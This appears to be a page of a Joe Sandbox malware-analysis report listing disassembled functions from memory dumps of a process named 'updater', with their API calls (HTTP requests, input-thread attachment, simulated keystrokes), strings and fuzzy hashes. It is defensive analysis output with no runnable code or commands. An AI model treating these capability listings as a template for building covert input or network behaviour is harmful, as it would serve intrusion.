Function 00C28F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C28FC1
CoInitialize.OLE32(00000000), ref: 00C28FEE
CoUninitialize.OLE32 ref: 00C28FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 00C290F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 00C29225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00C43BDC), ref: 00C29259
CoGetObject.OLE32(?,00000000,00C43BDC,?), ref: 00C2927C
SetErrorMode.KERNEL32(00000000), ref: 00C2928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C2930F
VariantClear.OLEAUT32(?), ref: 00C2931F

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 8b8a8f0e89dd01145363e81bf394f10150cfd9fad2e4247e2a22c37d716c9e3b
Instruction ID: 5becdf0cb3dc00f945f2e0647aff2c8e7731fb9d67a4a665ea22e8fcfeca68fb
Opcode Fuzzy Hash: 8b8a8f0e89dd01145363e81bf394f10150cfd9fad2e4247e2a22c37d716c9e3b
Instruction Fuzzy Hash: 99C146B1208315AFC700DF69D884A6BB7E9FF89308F10495DF98A9B251DB71ED05CB92

Function 00C119CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C119EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C10A67,?,00000001), ref: 00C11A03
GetWindowThreadProcessId.USER32(00000000), ref: 00C11A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C10A67,?,00000001), ref: 00C11A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C11A2B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C10A67,?,00000001), ref: 00C11A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C10A67,?,00000001), ref: 00C11A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C10A67,?,00000001), ref: 00C11A9B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C10A67,?,00000001), ref: 00C11AB0
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C10A67,?,00000001), ref: 00C11ABB

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: bdc8209e281b4b0b25bba041517fd202a4927a4cd3485a86f38a31d0c8169d37
Instruction ID: 69018edf57b04fba6dcfbbe6bf16629c04c6e0e7bd7cf5f3be94de42d259a733
Opcode Fuzzy Hash: bdc8209e281b4b0b25bba041517fd202a4927a4cd3485a86f38a31d0c8169d37
Instruction Fuzzy Hash: 6431CC75681204AFEB10DF90DC48BED3BAAEF56315F294119FF1586190CBB89EC4AB60

Function 00BEC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00BB260D
SetTextColor.GDI32(?,000000FF), ref: 00BB2617
SetBkMode.GDI32(?,00000001), ref: 00BB262C
GetStockObject.GDI32(00000005), ref: 00BB2634
GetClientRect.USER32(?), ref: 00BEC0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 00BEC113
GetWindowDC.USER32(?), ref: 00BEC11F
GetPixel.GDI32(00000000,?,?), ref: 00BEC12E
ReleaseDC.USER32(?,00000000), ref: 00BEC140
GetSysColor.USER32(00000005), ref: 00BEC15E

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: a8727761d62ea470a2f66d083792257eab794f98040acfad63c96f145e641e1a
Instruction ID: 3ab3fd2e3b2387c2852e511be0701534c0144d97f36e0659854e4ab59e54f604
Opcode Fuzzy Hash: a8727761d62ea470a2f66d083792257eab794f98040acfad63c96f145e641e1a
Instruction Fuzzy Hash: F1115935540245AFDB615FA4EC48BED7BB1FB0A321F204265FE6A950E1CB710951EF11

Function 00BBAD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BBADE1
OleUninitialize.OLE32(?,00000000), ref: 00BBAE80
UnregisterHotKey.USER32(?), ref: 00BBAFD7
DestroyWindow.USER32(?), ref: 00BF2F64
FreeLibrary.KERNEL32(?), ref: 00BF2FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BF2FF6

Strings

close all, xrefs: 00BBADDC

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: c4e6307fa93bdf80b1b1f94cf4e3665c1e7cc8996b4a49429ed85a6d00b25229
Instruction ID: 053d1dc417666145161205d64270fd70ffb411150e93add84f32048a2798a0ca
Opcode Fuzzy Hash: c4e6307fa93bdf80b1b1f94cf4e3665c1e7cc8996b4a49429ed85a6d00b25229
Instruction Fuzzy Hash: 99A138706012128FCB29EB24C495BB9F7E4FF04700F5542EEE90AAB252DB71AD56CF91

Function 00C0AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00C0B13A), ref: 00C0B078

Strings

TEXT, xrefs: 00C0AFAF
CLASS, xrefs: 00C0ADF7
NAME, xrefs: 00C0AEAA
INSTANCE, xrefs: 00C0AF86
CLASSNN, xrefs: 00C0AE1A
REGEXPCLASS, xrefs: 00C0AE3D

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: cdde3e7fe87c0498e07d8f8b8baeeca70999158d57da5249d1415b3336596b63
Instruction ID: 09a7191d3e9af084bd7aa402aeb1271f7b37b817a2bd22401d4b0c1495e5bcd3
Opcode Fuzzy Hash: cdde3e7fe87c0498e07d8f8b8baeeca70999158d57da5249d1415b3336596b63
Instruction Fuzzy Hash: 9991BCB0500606DACB18EFA0C481BEEFBB5FF14304F54815AE86AA72D1DF306E59DB91

Function 00BB31F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00BB327E

Part of subcall function 00BB218F: GetClientRect.USER32(?,?), ref: 00BB21B8
Part of subcall function 00BB218F: GetWindowRect.USER32(?,?), ref: 00BB21F9
Part of subcall function 00BB218F: ScreenToClient.USER32(?,?), ref: 00BB2221

GetDC.USER32 ref: 00BED073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BED086
SelectObject.GDI32(00000000,00000000), ref: 00BED094
SelectObject.GDI32(00000000,00000000), ref: 00BED0A9
ReleaseDC.USER32(?,00000000), ref: 00BED0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BED13C

Strings

U, xrefs: 00BED011

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: d5e3ae08e77a4d0ec3f3d1d15b718712308a3b76611e5dbe12d4e12ed3fb2b5d
Instruction ID: 2a333e14078c4e80e9446d2f3cdb430f57356060f2c8ca4e1f9ec255d25851c4
Opcode Fuzzy Hash: d5e3ae08e77a4d0ec3f3d1d15b718712308a3b76611e5dbe12d4e12ed3fb2b5d
Instruction Fuzzy Hash: 4B71D030400249EFCF218F64C894AFE7BF5FF49360F2842A9ED556A1A6C7B18891DB61

Function 00C3C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BB29F3

Part of subcall function 00BB2714: GetCursorPos.USER32(?), ref: 00BB2727
Part of subcall function 00BB2714: ScreenToClient.USER32(00C777B0,?), ref: 00BB2744
Part of subcall function 00BB2714: GetAsyncKeyState.USER32(00000001), ref: 00BB2769
Part of subcall function 00BB2714: GetAsyncKeyState.USER32(00000002), ref: 00BB2777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00C3C69C
ImageList_EndDrag.COMCTL32 ref: 00C3C6A2
ReleaseCapture.USER32 ref: 00C3C6A8
SetWindowTextW.USER32(?,00000000), ref: 00C3C752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C3C765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00C3C847

Strings

@GUI_DROPID, xrefs: 00C3C799
@GUI_DRAGFILE, xrefs: 00C3C7DC

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: c60a04f5a0b625a609da393e3bdfa89f90451444b6da39d043ff38e83e0f6a1f
Instruction ID: ca260888da43341759092fd2d70839d9bbf170a21236255c2e2e282cc2710333
Opcode Fuzzy Hash: c60a04f5a0b625a609da393e3bdfa89f90451444b6da39d043ff38e83e0f6a1f
Instruction Fuzzy Hash: 9E516A71104204AFDB14EF14CC9AFAE7BE1FB84310F108A1DF9A9972E2CB70A955CB52

Function 00C220E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C2211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C22148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C2218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C2219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C221AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C221DC
InternetCloseHandle.WININET(00000000), ref: 00C22223

Part of subcall function 00C22B4F: GetLastError.KERNEL32(?,?,00C21EE3,00000000,00000000,00000001), ref: 00C22B64
Part of subcall function 00C22B4F: SetEvent.KERNEL32(?,?,00C21EE3,00000000,00000000,00000001), ref: 00C22B79

Strings

, xrefs: 00C221CD

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 0fee6a19806c33b1b398313f4b269acf9b3661c5df2aff4a87b3922327fb82c7
Instruction ID: 5938874e87190059ca5853075f20768b10d6f74797c388dee290d15e302a29a7
Opcode Fuzzy Hash: 0fee6a19806c33b1b398313f4b269acf9b3661c5df2aff4a87b3922327fb82c7
Instruction Fuzzy Hash: E3419CB5540228BFEB129F60DC89FBF7BACFF08350F104116FA159A141DB719E449BA1

Function 00C29330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C40980), ref: 00C29412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C40980), ref: 00C29446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C295C0
SysFreeString.OLEAUT32(?), ref: 00C295EA

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: e26a063c499afbd07f83c1378946b44d4d86809e01a86c70be4b85c284462c8b
Instruction ID: 7ee05d0170d7140a08f2718ed41458434143bfe43ddc08040c849750af9e837b
Opcode Fuzzy Hash: e26a063c499afbd07f83c1378946b44d4d86809e01a86c70be4b85c284462c8b
Instruction Fuzzy Hash: D0F14C75A00219EFCF14DF94D884EAEB7B9FF45714F108198F916AB261CB31AE45CB90

Function 00C1527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C14BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C13B8A,?), ref: 00C14BE0

Part of subcall function 00C14BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C13B8A,?), ref: 00C14BF9

Part of subcall function 00C14FEC: GetFileAttributesW.KERNEL32(?,00C13BFE), ref: 00C14FED

lstrcmpiW.KERNEL32(?,?), ref: 00C152FB
_wcscmp.LIBCMT ref: 00C15315
MoveFileW.KERNEL32(?,?), ref: 00C15330

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 6ae281baaf1e0fb933114991d2a5f9ddea50e59af51c0987535f4cea9c24e74f
Instruction ID: b2bc4378f3a0d2485c2766c300c556a69808472a6a593090b8660944a2607c30
Opcode Fuzzy Hash: 6ae281baaf1e0fb933114991d2a5f9ddea50e59af51c0987535f4cea9c24e74f
Instruction Fuzzy Hash: 175195B20087849BC724DBA4D881EDFB3ECAF85310F50491EF199D3152EF34A6C99766

Function 00C38C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C38D24

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 7a49d0102a5bea7112358e77dd924049fc5867664fa760c1e081c9004d77608a
Instruction ID: 239d23dcdf0174c3046f8ca962472f00ebfaa09c71fd54935c03acb30d1272f5
Opcode Fuzzy Hash: 7a49d0102a5bea7112358e77dd924049fc5867664fa760c1e081c9004d77608a
Instruction Fuzzy Hash: BC51D134660305BFEF209F29DC89BAD7BA4BB05350F244511FA25EB1E1CF71AE98DA50

Function 00BB2F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00BEC638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BEC65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BEC672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00BEC690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BEC6B1
DestroyIcon.USER32(00000000), ref: 00BEC6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BEC6DD
DestroyIcon.USER32(?), ref: 00BEC6EC

Part of subcall function 00C3AAD4: DeleteObject.GDI32(00000000), ref: 00C3AB0D

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 9d8c5a7093190c10ed0091c5e4f6426799dc345e7853497958b1b6475a6c631e
Instruction ID: 6ccc97cc90bdaf1cd8d98d248c586ac3b911cf1474eb4b0eecb2e4e24ba0cd7c
Opcode Fuzzy Hash: 9d8c5a7093190c10ed0091c5e4f6426799dc345e7853497958b1b6475a6c631e
Instruction Fuzzy Hash: 09518A74600209AFDB24DF25CC85BBA7BF5FB49750F204668F946A7290D7B0EC91DB50

Function 00C0A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C0B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C0B54D
Part of subcall function 00C0B52D: GetCurrentThreadId.KERNEL32 ref: 00C0B554
Part of subcall function 00C0B52D: AttachThreadInput.USER32(00000000,?,00C0A23B,?,00000001), ref: 00C0B55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 00C0A246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C0A263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C0A266
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C0A26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C0A28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C0A290
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C0A299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C0A2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C0A2B3

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 93b7b5935874d35855982645495db51f78454b68f46cec4c6458426b0c8efd7f
Instruction ID: 7fdb63a1c8c1c668de75671ee0dbb4dd11dd5008b20e08f99afb2faef43b1f4e
Opcode Fuzzy Hash: 93b7b5935874d35855982645495db51f78454b68f46cec4c6458426b0c8efd7f
Instruction Fuzzy Hash: F011E1B5990618BEF6106F609C8AFAE3B2DEB4D751F210429F7446B0D0CAF35C50DAA0

Function 00C094D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C0915A,00000B00,?,?), ref: 00C094E2
HeapAlloc.KERNEL32(00000000,?,00C0915A,00000B00,?,?), ref: 00C094E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C0915A,00000B00,?,?), ref: 00C094FE
GetCurrentProcess.KERNEL32(?,00000000,?,00C0915A,00000B00,?,?), ref: 00C09506
DuplicateHandle.KERNEL32(00000000,?,00C0915A,00000B00,?,?), ref: 00C09509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C0915A,00000B00,?,?), ref: 00C09519
GetCurrentProcess.KERNEL32(00C0915A,00000000,?,00C0915A,00000B00,?,?), ref: 00C09521
DuplicateHandle.KERNEL32(00000000,?,00C0915A,00000B00,?,?), ref: 00C09524
CreateThread.KERNEL32(00000000,00000000,00C0954A,00000000,00000000,00000000), ref: 00C0953E

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: c9bd4a860ce0c1972ced9a96ff985503840398379de94d92eae5156fae7603d2
Instruction ID: 6e7fae0609133ba79bd241b6ddb365b123ea9d01dca1b0713b5e07dae9b69bbe
Opcode Fuzzy Hash: c9bd4a860ce0c1972ced9a96ff985503840398379de94d92eae5156fae7603d2
Instruction Fuzzy Hash: 9001A8B9680304BFE610ABA5DC4DF6F7BACFB89711F104411FA05DB1A1CA709800CA20

Function 00C2A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00C2A265
NULL Pointer assignment, xrefs: 00C2A28E, 00C2A5B2

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
